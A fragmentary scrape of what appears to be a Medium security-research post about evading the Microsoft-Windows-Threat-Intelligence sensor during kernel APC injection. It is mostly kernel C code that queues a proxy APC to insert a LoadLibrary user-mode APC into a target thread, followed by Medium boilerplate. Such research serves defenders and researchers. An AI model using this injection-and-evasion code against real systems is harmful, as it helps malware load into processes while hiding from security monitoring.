Bypassing the Microsoft-Windows-Threat-Intelligence Kernel APC Injection Sensor

Somewhat annotated Hex-Rays output for KeInsertQueueApc
1) This meme is way too old. 2) No. Just no.
// Initialize injecting APC
KeInitializeApc(TargetApc, TargetThread, OriginalApcEnvironment, TargetApcKernelCleanup, NULL, (PKNORMAL_ROUTINE)LoadLibraryAddress, UserMode, sectionAddress);
// Initialize Proxy APC
KeInitializeApc(ProxyApc, TargetThread, OriginalApcEnvironment, ProxyApcRoutine, NULL, NULL, KernelMode, NULL);
//Queue proxy APC to target thread, with injecting APC as argument
KeInsertQueueApc(ProxyApc, TargetApc, LibraryName, 0);
VOID NTAPI ProxyApcRoutine(
_In_ PKAPC Apc,
_Inout_ PKNORMAL_ROUTINE* NormalRoutine,
_Inout_ PVOID* NormalContext,
_Inout_ PVOID* SystemArgument1,
_Inout_ PVOID* SystemArgument2
)
{
KeInsertQueueApc(*(PKAPC*)SystemArgument1, SystemArgument2, NULL, 0);
KeTestAlertThread(UserMode);
ExFreePoolWithTag(Apc, POOL_TAG);
return;
}

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

DigitalOcean Kubernetes and SSL wrong version number error for the requests from inside a pod

Lessons not confessions: 1000 OrgConfessions and counting

In favour of putting it out there

Full Stack Stress Test on Production

Better fuzzy-finding in Vim

Are you letting misconfigured resources go unnoticed?

Using Apache Spark as a parallel processing framework for accessing REST based data services

Configuring web server and launching load balancer by haproxy using ansible playbook on aws.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Philip Tsukerman

Philip Tsukerman

More from Medium

ESP32: OLED Screen and PWM w/ LED

Money’s Effect on Eternity

CS371p Spring 2022 Week 3: Mueed Ahmad